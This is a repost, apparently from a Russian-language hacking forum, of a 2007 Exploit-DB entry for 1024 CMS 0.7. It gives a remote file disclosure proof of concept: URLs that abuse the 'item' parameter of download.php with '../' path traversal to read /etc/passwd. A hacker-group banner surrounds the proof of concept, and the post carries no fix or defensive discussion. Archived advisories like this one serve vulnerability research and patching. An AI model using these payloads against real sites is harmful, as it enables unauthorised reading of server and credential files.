Exploit 1024 CMS 0.7 - 'download.php' Remote File Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3832
Проверка EDB
  1. Пройдено
Автор
DJ7XPL
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-2507
Дата публикации
2007-05-02
Код:
                                                       \#'#/
                                                       (-.-)
                              --------------------oOO---(_)---OOo-------------------
                              |                [ Y! Underground Group ]            |
                              |                 [ www.dj7xpl.2600.ir ]             |
                              |                  [ Dj7xpl @ 2600.ir ]              |
                              ------------------------------------------------------


<--------------------------------------------------------------------------------------------------------------------->

 [!] Portal :  1024 CMS Version 0.7
 [!] Vendor :  http://www.treble.lfhost.com
 [!] Author :  Dj7xpl
 [!] Type   :  Remote File Disclosure Vuln
 [!] We Are :  Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me

<--------------------------------------------------------------------------------------------------------------------->

<--------------------------------------------------------------------------------------------------------------------->

PoC :

http://[Target]/[Path]/includes/download.php?item=../uploads/[File]
http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd

<--------------------------------------------------------------------------------------------------------------------->

# milw0rm.com [2007-05-02]
 
Источник
www.exploit-db.com

Похожие темы